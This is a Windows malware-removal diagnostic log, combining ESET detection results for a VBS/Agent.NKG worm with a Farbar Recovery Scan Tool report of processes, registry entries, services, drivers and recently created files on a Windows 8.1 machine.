C:\Users\User not found\AppData\Local\Mozilla\Firefox\Profiles\3ajkld8y.default\cache2\entries\391B8FC2192C71AD395205EAD9E0BD0C54134292    VBS/Agent.NKG worm    deleted
C:\Users\User not found\AppData\Roaming\WindowsServices\helper.vbs    VBS/Agent.NKG worm    cleaned by deleting
C:\Users\User not found\AppData\Roaming\WindowsServices\installer.vbs    VBS/Agent.NKG worm    cleaned by deleting
C:\Users\User not found\AppData\Roaming\WindowsServices\movemenoreg.vbs    VBS/Agent.NKG worm    cleaned by deleting
C:\Users\User not found\Desktop\helper    VBS/Agent.NKG worm    cleaned by deleting
C:\Users\User not found\Desktop\installer    VBS/Agent.NKG worm    cleaned by deleting
C:\Users\User not found\Desktop\movemenoreg    VBS/Agent.NKG worm    cleaned by deleting
D:\$RECYCLE.BIN\S-1-5-21-1385599797-3515456581-1080265950-1001\$RPNVIGY.exe    a variant of Win32/Packed.Themida suspicious application    cleaned by deleting
D:\$RECYCLE.BIN\S-1-5-21-1385599797-3515456581-1080265950-1001\$RV1K56P.rar    a variant of Win32/Packed.Themida suspicious application    deleted
 

 

 

 

 

 

 

 

 

 

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 17-07-2016 03
Ran by User not found (administrator) on ERROR (18-07-2016 13:49:59)
Running from C:\Users\User not found\Downloads
Loaded Profiles: User not found (Available Profiles: User not found)
Platform: Windows 8.1 Pro (Update) (X64) Language: Português (Portugal)
Internet Explorer Version 11 (Default browser: FF)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
(Intel Corporation) C:\Windows\System32\igfxCUIService.exe
(AVAST Software) C:\Program Files\AVAST Software\Avast\AvastSvc.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamService.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
(Microsoft Corporation) C:\Windows\System32\GWX\GWX.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe
() C:\Windows\SysWOW64\PnkBstrA.exe
(Microsoft Corporation) C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe
(Intel Corporation) C:\Windows\System32\igfxEM.exe
(Intel Corporation) C:\Windows\System32\igfxHK.exe
(AVAST Software) C:\Program Files\AVAST Software\Avast\avastui.exe
(Intel Corporation) C:\Windows\System32\igfxTray.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamUserAgent.exe
(Adobe Systems, Inc.) C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerPlugin_22_0_0_209.exe
(Adobe Systems, Inc.) C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerPlugin_22_0_0_209.exe


==================== Registry (Whitelisted) ===========================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [NvBackend] => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe [2397120 2016-06-29] (NVIDIA Corporation)
HKLM\...\Run: [ShadowPlay] => "C:\Windows\system32\rundll32.exe" C:\Windows\system32\nvspcap64.dll,ShadowPlayOnSystemStart
HKLM-x32\...\Run: [AvastUI.exe] => C:\Program Files\AVAST Software\Avast\AvastUI.exe [8900328 2016-07-13] (AVAST Software)
HKLM\...\Policies\Explorer: [NoAutorun] 1
HKU\S-1-5-21-2876588207-1483049806-666444280-1002\...\Run: [Steam] => C:\Program Files (x86)\Steam\steam.exe [2917456 2016-06-15] (Valve Corporation)
HKU\S-1-5-21-2876588207-1483049806-666444280-1002\...\Run: [Skype] => C:\Program Files (x86)\Skype\Phone\Skype.exe [26424960 2016-06-29] (Skype Technologies S.A.)
AppInit_DLLs: C:\Windows\system32\nvinitx.dll => C:\Windows\system32\nvinitx.dll [178136 2016-06-29] (NVIDIA Corporation)
AppInit_DLLs-x32: C:\Windows\SysWOW64\nvinit.dll => C:\Windows\SysWOW64\nvinit.dll [155768 2016-06-29] (NVIDIA Corporation)
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShA64.dll [2016-07-13] (AVAST Software)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\errorlog.txt [2016-07-17] ()
Startup: C:\Users\User not found\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\errorlog.txt [2016-07-17] ()
Startup: C:\Users\User not found\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\helper.lnk [2016-07-16]
ShortcutTarget: helper.lnk -> C:\Users\User not found\AppData\Roaming\WindowsServices\helper.vbs (No File)

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{75C866C4-A430-4FAE-AF9D-71B6AAF83C57}: [NameServer] 8.8.8.8,8.8.4.4
Tcpip\..\Interfaces\{75C866C4-A430-4FAE-AF9D-71B6AAF83C57}: [DhcpNameServer] 192.168.1.1

Internet Explorer:
==================
BHO: avast! Online Security -> {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} -> C:\Program Files\AVAST Software\Avast\aswWebRepIE64.dll [2016-07-13] (AVAST Software)
BHO-x32: avast! Online Security -> {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} -> C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll [2016-07-13] (AVAST Software)

FireFox:
========
FF ProfilePath: C:\Users\User not found\AppData\Roaming\Mozilla\Firefox\Profiles\3ajkld8y.default
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_22_0_0_209.dll [2016-07-12] ()
FF Plugin: @esn/npbattlelog,version=2.7.1 -> C:\Program Files (x86)\Battlelog Web Plugins\2.7.1\npbattlelogx64.dll [2015-04-30] (EA Digital Illusions CE AB)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_22_0_0_209.dll [2016-07-12] ()
FF Plugin-x32: @esn/npbattlelog,version=2.7.1 -> C:\Program Files (x86)\Battlelog Web Plugins\2.7.1\npbattlelog.dll [2015-04-30] (EA Digital Illusions CE AB)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.20513.0\npctrl.dll [2013-05-13] ( Microsoft Corporation)
FF Extension: Unseen - C:\Users\User not found\AppData\Roaming\Mozilla\Firefox\Profiles\3ajkld8y.default\Extensions\unseen@tangrs.xpi [2016-06-15]
FF Extension: Adblock Plus - C:\Users\User not found\AppData\Roaming\Mozilla\Firefox\Profiles\3ajkld8y.default\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2016-06-15]

==================== Services (Whitelisted) ========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 avast! Antivirus; C:\Program Files\AVAST Software\Avast\AvastSvc.exe [197128 2016-07-13] (AVAST Software)
R2 GfExperienceService; C:\Program Files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe [1163712 2016-06-29] (NVIDIA Corporation)
R2 igfxCUIService1.0.0.0; C:\Windows\system32\igfxCUIService.exe [330136 2015-08-27] (Intel Corporation)
R2 NvNetworkService; C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe [1879488 2016-06-29] (NVIDIA Corporation)
R3 NvStreamNetworkSvc; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe [3632576 2016-06-29] (NVIDIA Corporation)
R2 NvStreamSvc; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamService.exe [2521024 2016-06-29] (NVIDIA Corporation)
S3 Origin Client Service; C:\Program Files (x86)\Origin\OriginClientService.exe [2122248 2016-06-23] (Electronic Arts)
R2 PnkBstrA; C:\Windows\SysWOW64\PnkBstrA.exe [75136 2016-06-23] ()
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [366552 2015-07-07] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [23824 2015-07-07] (Microsoft Corporation)

===================== Drivers (Whitelisted) ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 aswHwid; C:\Windows\system32\drivers\aswHwid.sys [37656 2016-07-13] (AVAST Software)
R1 aswKbd; C:\Windows\system32\drivers\aswKbd.sys [37144 2016-07-13] (AVAST Software)
R2 aswMonFlt; C:\Windows\system32\drivers\aswMonFlt.sys [108304 2016-07-13] (AVAST Software)
R1 aswRdr; C:\Windows\system32\drivers\aswRdr2.sys [103064 2016-07-13] (AVAST Software)
R0 aswRvrt; C:\Windows\System32\Drivers\aswRvrt.sys [74544 2016-07-13] (AVAST Software)
R1 aswSnx; C:\Windows\system32\drivers\aswSnx.sys [1070904 2016-07-13] (AVAST Software)
R1 aswSP; C:\Windows\system32\drivers\aswSP.sys [473592 2016-07-13] (AVAST Software)
R2 aswStm; C:\Windows\system32\drivers\aswStm.sys [162904 2016-07-13] (AVAST Software)
R0 aswVmm; C:\Windows\System32\Drivers\aswVmm.sys [290088 2016-07-13] (AVAST Software)
R3 btmhsf; C:\Windows\system32\DRIVERS\btmhsf.sys [1390904 2013-10-15] (Motorola Solutions, Inc.)
S0 ebdrv; C:\Windows\System32\drivers\evbda.sys [3357024 2013-08-22] (Broadcom Corporation)
R3 NETwNe64; C:\Windows\system32\DRIVERS\NETwew00.sys [3345376 2013-09-04] (Intel Corporation)
R3 NvStreamKms; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [26560 2016-06-29] (NVIDIA Corporation)
R3 nvvad_WaveExtensible; C:\Windows\system32\drivers\nvvad64v.sys [56384 2016-06-29] (NVIDIA Corporation)
R3 RadioHIDMini; C:\Windows\System32\drivers\RadioHIDMini.sys [32168 2015-07-16] (Windows ® Win 7 DDK provider)
R3 SensorsSimulatorDriver; C:\Windows\system32\DRIVERS\WUDFRd.sys [226304 2014-11-21] (Microsoft Corporation)
S3 WdBoot; C:\Windows\system32\drivers\WdBoot.sys [44560 2015-07-07] (Microsoft Corporation)
S3 WdFilter; C:\Windows\system32\drivers\WdFilter.sys [270168 2015-07-07] (Microsoft Corporation)
S3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [114520 2015-07-07] (Microsoft Corporation)
S3 WirelessKeyboardFilter; C:\Windows\System32\drivers\WirelessKeyboardFilter.sys [49384 2016-03-29] (Microsoft Corporation)

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-07-18 13:20 - 2016-07-18 13:20 - 00001054 _____ C:\Users\User not found\Desktop\MBAM.txt
2016-07-18 10:47 - 2016-07-18 10:48 - 00192216 _____ (Malwarebytes) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2016-07-18 10:47 - 2016-07-18 10:47 - 00001114 _____ C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2016-07-18 10:47 - 2016-07-18 10:47 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2016-07-18 10:47 - 2016-07-18 10:47 - 00000000 ____D C:\ProgramData\Malwarebytes
2016-07-18 10:47 - 2016-07-18 10:47 - 00000000 ____D C:\Program Files (x86)\Malwarebytes Anti-Malware
2016-07-18 10:47 - 2016-03-10 14:09 - 00065408 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2016-07-18 10:47 - 2016-03-10 14:08 - 00140672 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbamchameleon.sys
2016-07-18 10:47 - 2016-03-10 14:08 - 00027008 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbam.sys
2016-07-18 10:46 - 2016-07-18 10:46 - 22851472 _____ (Malwarebytes ) C:\Users\User not found\Desktop\mbam-setup-2.2.1.1043.exe
2016-07-18 06:40 - 2016-07-18 06:40 - 00004892 _____ C:\Users\User not found\Desktop\ESET.txt
2016-07-17 22:55 - 2016-07-17 22:55 - 02870984 _____ (ESET) C:\Users\User not found\Desktop\esetsmartinstaller_enu.exe
2016-07-17 22:55 - 2016-07-17 22:55 - 00000000 ____D C:\Program Files (x86)\ESET
2016-07-17 22:07 - 2016-07-17 22:08 - 00000000 ____D C:\Rem-VBSqt
2016-07-17 22:06 - 2016-07-17 22:06 - 00114176 _____ (bartblaze) C:\Users\User not found\Desktop\Rem-VBSworm.exe
2016-07-17 19:51 - 2016-07-17 19:52 - 00000829 _____ C:\Users\User not found\Downloads\Search.txt
2016-07-17 19:03 - 2016-07-17 19:31 - 00000000 ____D C:\AdwCleaner
2016-07-17 19:03 - 2016-07-17 19:03 - 03712064 _____ C:\Users\User not found\Desktop\AdwCleaner.exe
2016-07-17 18:50 - 2016-07-17 19:57 - 00290304 _____ (Microsoft Corporation) C:\Windows\SysWOW64\subinacl.exe
2016-07-17 18:50 - 2016-07-17 18:50 - 00000000 ____D C:\Program Files (x86)\Adware Removal Tool by TSA
2016-07-17 18:47 - 2016-07-17 18:48 - 00752296 _____ C:\Users\User not found\Desktop\Adware Removal Tool by TSA.exe
2016-07-16 22:47 - 2016-07-16 22:49 - 00004811 _____ C:\Users\User not found\Downloads\Fixlog.txt
2016-07-16 14:35 - 2016-07-16 14:35 - 00000127 _____ C:\Users\User not found\Desktop\ckfiles.txt
2016-07-16 14:34 - 2016-07-16 14:34 - 00468480 _____ () C:\Users\User not found\Desktop\CKScanner.exe
2016-07-16 13:51 - 2016-07-17 19:51 - 00000000 ____D C:\Users\User not found\Downloads\FRST-OlderVersion
2016-07-16 12:49 - 2016-07-16 12:49 - 00000000 ____D C:\Windows\system32\appmgmt
2016-07-15 22:34 - 2016-07-15 22:34 - 00077163 _____ C:\Users\User not found\Documents\Summary.zip
2016-07-15 22:30 - 2016-07-15 22:30 - 01987490 _____ C:\Users\User not found\Documents\Summary.nfo
2016-07-15 22:20 - 2016-07-16 14:25 - 00027622 _____ C:\Users\User not found\Downloads\Addition.txt
2016-07-15 22:18 - 2016-07-18 13:50 - 00009898 _____ C:\Users\User not found\Downloads\FRST.txt
2016-07-15 22:18 - 2016-07-18 13:49 - 00000000 ____D C:\FRST
2016-07-15 22:18 - 2016-07-17 19:51 - 02391040 _____ (Farbar) C:\Users\User not found\Downloads\FRST64.exe
2016-07-15 14:54 - 2016-07-15 14:55 - 00000000 ____D C:\Users\User not found\AppData\Roaming\Notepad++
2016-07-15 14:54 - 2016-07-15 14:54 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Notepad++
2016-07-15 14:54 - 2016-07-15 14:54 - 00000000 ____D C:\Program Files (x86)\Notepad++
2016-07-13 20:11 - 2016-07-13 20:11 - 00000446 __RSH C:\ProgramData\ntuser.pol
2016-07-13 19:27 - 2016-07-13 19:27 - 00003892 _____ C:\Windows\System32\Tasks\SafeZone scheduled Autoupdate 1468434428
2016-07-13 19:27 - 2016-07-13 19:27 - 00001053 _____ C:\Users\Public\Desktop\Avast SafeZone Browser.lnk
2016-07-13 19:27 - 2016-07-13 19:27 - 00001053 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Avast SafeZone Browser.lnk
2016-07-13 19:26 - 2016-07-13 19:26 - 00037144 _____ (AVAST Software) C:\Windows\system32\Drivers\aswKbd.sys
2016-07-13 19:25 - 2016-07-13 19:25 - 00001938 _____ C:\Users\Public\Desktop\Avast Free Antivirus.lnk
2016-07-13 19:25 - 2016-07-13 19:25 - 00000000 ____D C:\Users\User not found\AppData\Roaming\AVAST Software
2016-07-13 19:25 - 2016-07-13 19:25 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVAST Software
2016-07-13 19:24 - 2016-07-13 19:25 - 00473592 _____ (AVAST Software) C:\Windows\system32\Drivers\aswsp.sys
2016-07-13 19:24 - 2016-07-13 19:24 - 00390984 _____ (AVAST Software) C:\Windows\system32\aswBoot.exe
2016-07-13 19:24 - 2016-07-13 19:24 - 00290088 _____ (AVAST Software) C:\Windows\system32\Drivers\aswVmm.sys
2016-07-13 19:24 - 2016-07-13 19:24 - 00162904 _____ (AVAST Software) C:\Windows\system32\Drivers\aswStm.sys
2016-07-13 19:24 - 2016-07-13 19:24 - 00108304 _____ (AVAST Software) C:\Windows\system32\Drivers\aswMonFlt.sys
2016-07-13 19:24 - 2016-07-13 19:24 - 00103064 _____ (AVAST Software) C:\Windows\system32\Drivers\aswRdr2.sys
2016-07-13 19:24 - 2016-07-13 19:24 - 00074544 _____ (AVAST Software) C:\Windows\system32\Drivers\aswRvrt.sys
2016-07-13 19:24 - 2016-07-13 19:24 - 00053208 _____ (AVAST Software) C:\Windows\avastSS.scr
2016-07-13 19:24 - 2016-07-13 19:24 - 00037656 _____ (AVAST Software) C:\Windows\system32\Drivers\aswHwid.sys
2016-07-13 19:24 - 2016-07-13 19:24 - 00003922 _____ C:\Windows\System32\Tasks\avast! Emergency Update
2016-07-13 19:24 - 2016-07-13 19:24 - 00000000 ____D C:\Windows\System32\Tasks\AVAST Software
2016-07-13 19:24 - 2016-07-13 19:24 - 00000000 ____D C:\Program Files\Common Files\AV
2016-07-13 19:24 - 2016-07-13 19:23 - 01070904 _____ (AVAST Software) C:\Windows\system32\Drivers\aswSnx.sys
2016-07-13 19:23 - 2016-07-13 19:26 - 00000000 ____D C:\Program Files\AVAST Software
2016-07-13 19:22 - 2016-07-13 19:26 - 00000000 ____D C:\ProgramData\AVAST Software
2016-07-13 15:44 - 2016-07-13 18:18 - 00000000 ____D C:\Users\User not found\AppData\Roaming\NVIDIA
2016-07-12 19:20 - 2016-07-12 19:20 - 06079168 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerInstaller.exe
2016-07-11 18:17 - 2016-07-11 18:17 - 00000000 ____D C:\Users\User not found\AppData\Local\NVIDIA Corporation
2016-07-11 18:16 - 2016-07-11 18:16 - 00000000 ____D C:\Users\User not found\AppData\Local\NVIDIA
2016-07-11 18:16 - 2016-06-29 23:44 - 00112216 _____ C:\Windows\system32\NvRtmpStreamer64.dll
2016-07-11 18:15 - 2016-07-11 18:15 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\NVIDIA Corporation
2016-07-11 18:15 - 2016-06-29 23:44 - 01767944 _____ (NVIDIA Corporation) C:\Windows\system32\nvspcap64.dll
2016-07-11 18:15 - 2016-06-29 23:44 - 01756424 _____ (NVIDIA Corporation) C:\Windows\system32\nvspbridge64.dll
2016-07-11 18:15 - 2016-06-29 23:44 - 01377800 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvspcap.dll
2016-07-11 18:15 - 2016-06-29 23:44 - 01316184 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvspbridge.dll
2016-07-11 18:14 - 2016-07-11 18:14 - 00000000 ____D C:\Windows\SysWOW64\NV
2016-07-11 18:14 - 2016-07-11 18:14 - 00000000 ____D C:\Windows\system32\NV
2016-07-11 18:14 - 2016-07-11 18:14 - 00000000 ____D C:\Program Files (x86)\VulkanRT
2016-07-11 18:14 - 2016-06-29 19:36 - 06364728 _____ (NVIDIA Corporation) C:\Windows\system32\nvcpl.dll
2016-07-11 18:14 - 2016-06-29 19:36 - 02455608 _____ (NVIDIA Corporation) C:\Windows\system32\nvsvc64.dll
2016-07-11 18:14 - 2016-06-29 19:36 - 01762752 _____ (NVIDIA Corporation) C:\Windows\system32\nvsvcr.dll
2016-07-11 18:14 - 2016-06-29 19:36 - 01352760 _____ (NVIDIA Corporation) C:\Windows\system32\nvvsvc.exe
2016-07-11 18:14 - 2016-06-29 19:36 - 00532416 _____ (NVIDIA Corporation) C:\Windows\system32\nv3dappshext.dll
2016-07-11 18:14 - 2016-06-29 19:36 - 00393784 _____ (NVIDIA Corporation) C:\Windows\system32\nvmctray.dll
2016-07-11 18:14 - 2016-06-29 19:36 - 00083512 _____ (NVIDIA Corporation) C:\Windows\system32\nv3dappshextr.dll
2016-07-11 18:14 - 2016-06-29 19:36 - 00069568 _____ (NVIDIA Corporation) C:\Windows\system32\nvshext.dll
2016-07-11 18:14 - 2016-06-23 09:04 - 07208075 _____ C:\Windows\system32\nvcoproc.bin
2016-07-11 18:14 - 2016-05-04 03:23 - 00129824 _____ C:\Windows\SysWOW64\vulkan-1.dll
2016-07-11 18:14 - 2016-05-04 03:22 - 00130848 _____ C:\Windows\system32\vulkan-1.dll
2016-07-11 18:14 - 2016-05-04 03:22 - 00045344 _____ C:\Windows\system32\vulkaninfo.exe
2016-07-11 18:14 - 2016-05-04 03:22 - 00040224 _____ C:\Windows\SysWOW64\vulkaninfo.exe
2016-07-11 18:13 - 2016-07-11 18:17 - 00000000 ____D C:\ProgramData\NVIDIA Corporation
2016-07-11 18:06 - 2016-06-29 23:44 - 39979576 _____ C:\Windows\system32\nvcompiler.dll
2016-07-11 18:06 - 2016-06-29 23:44 - 35115968 _____ C:\Windows\SysWOW64\nvcompiler.dll
2016-07-11 18:06 - 2016-06-29 23:44 - 31626808 _____ (NVIDIA Corporation) C:\Windows\system32\nvoglv64.dll
2016-07-11 18:06 - 2016-06-29 23:44 - 25402424 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvoglv32.dll
2016-07-11 18:06 - 2016-06-29 23:44 - 19199216 _____ (NVIDIA Corporation) C:\Windows\system32\nvwgf2umx.dll
2016-07-11 18:06 - 2016-06-29 23:44 - 17302264 _____ (NVIDIA Corporation) C:\Windows\system32\nvd3dumx.dll
2016-07-11 18:06 - 2016-06-29 23:44 - 16774904 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvwgf2um.dll
2016-07-11 18:06 - 2016-06-29 23:44 - 14356952 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvd3dum.dll
2016-07-11 18:06 - 2016-06-29 23:44 - 13523392 _____ (NVIDIA Corporation) C:\Windows\system32\Drivers\nvlddmkm.sys
2016-07-11 18:06 - 2016-06-29 23:44 - 10672752 _____ (NVIDIA Corporation) C:\Windows\system32\nvopencl.dll
2016-07-11 18:06 - 2016-06-29 23:44 - 10656296 _____ C:\Windows\system32\nvptxJitCompiler.dll
2016-07-11 18:06 - 2016-06-29 23:44 - 10214760 _____ (NVIDIA Corporation) C:\Windows\system32\nvcuda.dll
2016-07-11 18:06 - 2016-06-29 23:44 - 09006760 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvopencl.dll
2016-07-11 18:06 - 2016-06-29 23:44 - 08742032 _____ C:\Windows\SysWOW64\nvptxJitCompiler.dll
2016-07-11 18:06 - 2016-06-29 23:44 - 08600904 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvcuda.dll
2016-07-11 18:06 - 2016-06-29 23:44 - 03828968 _____ (NVIDIA Corporation) C:\Windows\system32\nvapi64.dll
2016-07-11 18:06 - 2016-06-29 23:44 - 03513400 _____ (NVIDIA Corporation) C:\Windows\system32\nvcuvid.dll
2016-07-11 18:06 - 2016-06-29 23:44 - 03387080 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvapi.dll
2016-07-11 18:06 - 2016-06-29 23:44 - 03067448 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvcuvid.dll
2016-07-11 18:06 - 2016-06-29 23:44 - 01922616 _____ (NVIDIA Corporation) C:\Windows\system32\nvdispco6436869.dll
2016-07-11 18:06 - 2016-06-29 23:44 - 01571776 _____ (NVIDIA Corporation) C:\Windows\system32\nvdispgenco6436869.dll
2016-07-11 18:06 - 2016-06-29 23:44 - 00984000 _____ (NVIDIA Corporation) C:\Windows\system32\NvFBC64.dll
2016-07-11 18:06 - 2016-06-29 23:44 - 00909248 _____ (NVIDIA Corporation) C:\Windows\system32\NvIFR64.dll
2016-07-11 18:06 - 2016-06-29 23:44 - 00771640 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\NvFBC.dll
2016-07-11 18:06 - 2016-06-29 23:44 - 00707520 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\NvIFR.dll
2016-07-11 18:06 - 2016-06-29 23:44 - 00669952 _____ C:\Windows\system32\nvfatbinaryLoader.dll
2016-07-11 18:06 - 2016-06-29 23:44 - 00565392 _____ C:\Windows\SysWOW64\nvfatbinaryLoader.dll
2016-07-11 18:06 - 2016-06-29 23:44 - 00476664 _____ (NVIDIA Corporation) C:\Windows\system32\nvumdshimx.dll
2016-07-11 18:06 - 2016-06-29 23:44 - 00394912 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvumdshim.dll
2016-07-11 18:06 - 2016-06-29 23:44 - 00178136 _____ (NVIDIA Corporation) C:\Windows\system32\nvinitx.dll
2016-07-11 18:06 - 2016-06-29 23:44 - 00155768 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvinit.dll
2016-07-11 18:06 - 2016-06-29 23:44 - 00153416 _____ (NVIDIA Corporation) C:\Windows\system32\nvoglshim64.dll
2016-07-11 18:06 - 2016-06-29 23:44 - 00131768 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvoglshim32.dll
2016-07-11 18:06 - 2016-06-29 23:44 - 00113216 _____ (NVIDIA Corporation) C:\Windows\system32\nvaudcap64v.dll
2016-07-11 18:06 - 2016-06-29 23:44 - 00102976 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvaudcap32v.dll
2016-07-11 18:06 - 2016-06-29 23:44 - 00056384 _____ (NVIDIA Corporation) C:\Windows\system32\Drivers\nvvad64v.sys
2016-07-11 18:06 - 2016-06-29 23:44 - 00039124 _____ C:\Windows\system32\nvinfo.pb
2016-07-11 18:06 - 2016-06-29 23:44 - 00038336 _____ (NVIDIA Corporation) C:\Windows\system32\Drivers\nvpciflt.sys
2016-07-11 18:06 - 2016-06-29 23:44 - 00000594 _____ C:\Windows\SysWOW64\nv-vk32.json
2016-07-11 18:06 - 2016-06-29 23:44 - 00000594 _____ C:\Windows\system32\nv-vk64.json
2016-07-11 18:02 - 2016-07-11 18:02 - 00000000 ____D C:\NVIDIA
2016-07-06 00:18 - 2016-07-06 00:18 - 00000990 _____ C:\Users\User not found\Desktop\Problemas da net.txt
2016-07-04 17:31 - 2016-07-04 17:39 - 00000000 ____D C:\Users\User not found\Desktop\Fotos
2016-07-04 16:33 - 2016-07-04 16:33 - 00280904 _____ C:\Windows\SysWOW64\PnkBstrB.xtr
2016-07-04 16:33 - 2016-07-04 16:33 - 00000000 ____D C:\Users\User not found\AppData\Local\PunkBuster
2016-07-04 16:32 - 2016-07-04 16:32 - 00000000 ____D C:\Users\User not found\AppData\Local\ESN
2016-07-04 16:32 - 2016-07-04 16:32 - 00000000 ____D C:\Program Files (x86)\Battlelog Web Plugins
2016-07-02 19:42 - 2016-07-02 19:42 - 00000000 ____D C:\Users\User not found\AppData\Roaming\NuGet
2016-07-02 19:42 - 2016-07-02 19:42 - 00000000 ____D C:\Users\User not found\AppData\LocalLow\Temp
2016-07-02 19:35 - 2016-07-02 19:35 - 00000000 ____D C:\ProgramData\Microsoft Visual Studio
2016-07-02 19:31 - 2016-07-02 19:31 - 00000000 ____D C:\Users\User not found\.dnx
2016-07-02 15:46 - 2016-07-15 14:34 - 00000000 ____D C:\Users\User not found\Documents\Visual Studio 2015
2016-07-02 15:13 - 2016-07-02 15:13 - 00000000 ____D C:\Program Files\IIS Express
2016-07-02 15:13 - 2016-07-02 15:13 - 00000000 ____D C:\Program Files (x86)\IIS Express
2016-07-02 15:11 - 2016-07-02 15:11 - 00000000 ____D C:\Users\User not found\AppData\Local\VSIXInstaller
2016-07-02 15:02 - 2016-07-02 15:02 - 00030400 _____ (Microsoft Corporation) C:\Windows\system32\aspnet_counters.dll
2016-07-02 15:02 - 2016-07-02 15:02 - 00028352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\aspnet_counters.dll
2016-07-02 14:44 - 2016-07-02 14:44 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Silverlight
2016-07-02 14:44 - 2016-07-02 14:44 - 00000000 ____D C:\Program Files (x86)\Microsoft Silverlight
2016-07-02 14:42 - 2016-07-02 14:43 - 00000000 ____D C:\Program Files (x86)\Microsoft SQL Server Compact Edition
2016-07-02 14:42 - 2016-07-02 14:42 - 00000000 ____D C:\Program Files\Microsoft SQL Server Compact Edition
2016-07-02 14:37 - 2016-07-02 14:37 - 00000000 ____D C:\ProgramData\Microsoft DNX
2016-07-02 14:29 - 2016-07-02 14:29 - 00000000 ____D C:\Program Files\IIS
2016-07-02 14:29 - 2016-07-02 14:29 - 00000000 ____D C:\Program Files (x86)\IIS
2016-07-02 14:22 - 2016-07-16 13:21 - 00000000 ____D C:\Program Files (x86)\Windows Kits
